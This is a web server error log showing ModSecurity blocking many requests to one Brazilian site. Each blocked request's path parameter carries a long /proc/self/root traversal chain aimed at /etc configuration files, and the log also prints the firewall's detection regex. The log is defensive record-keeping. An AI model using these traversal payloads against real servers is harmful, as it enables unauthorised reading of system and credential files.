[Thu Mar 19 05:07:11.171494 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:57622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuur9a6ubjKNq_cu4YUswAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:12.536779 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:44538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuusF_V7PWP6ixUYl6NzgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:16.586786 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.244.43:33274] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuutBkFeYa1D6dYQnDAuwAAAdU"]
[Thu Mar 19 05:07:23.434445 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:44550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuu8df6f5d65gmYZRFXQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:25.670096 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:47152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuvOoXxyEfFpUF8f_i4wAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:26.157786 2026] [mime_magic:error] [pid 19093:tid 140411683178240] (70014)End of file found: [client 57.141.18.30:47452] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:07:28.431865 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:47164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuwOoXxyEfFpUF8f_i7QAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:00.987599 2026] [mime_magic:error] [pid 14269:tid 140411666392832] (70014)End of file found: [client 57.141.18.78:48496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:08:19.555360 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:34078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuu8-oXxyEfFpUF8f_jKwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:26.276164 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:54164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuu-hkFeYa1D6dYQnDA7QAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:27.707449 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuu-9a6ubjKNq_cu4YU5gAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:29.040327 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:54192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuu_eyqAr6etmhZHNo1lQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:30.328693 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:43126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuu_vu8EFLIOrSqIptw9QAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:32.827608 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:43138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvAOoXxyEfFpUF8f_jLwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:36.401335 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:43148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvBAkwaGbbGflqUZCIQQAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:38.800125 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:43164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvBuyqAr6etmhZHNo1mQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:41.300573 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:34092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvCRkFeYa1D6dYQnDA9wAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:42.549367 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:34104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvCta6ubjKNq_cu4YU6wAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:43.835206 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:34108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvCwkwaGbbGflqUZCITgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:45.339039 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:34114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvDcdf6f5d65gmYZRFjwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:46.680261 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:34122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvDuyqAr6etmhZHNo1nQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:49.099592 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:34134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvEeoXxyEfFpUF8f_jNgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:50.727010 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:59938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvEgkwaGbbGflqUZCIVgAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:08:52.406905 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.243.128:59948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvFP-YZRR_7pZ7nDJfbwAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
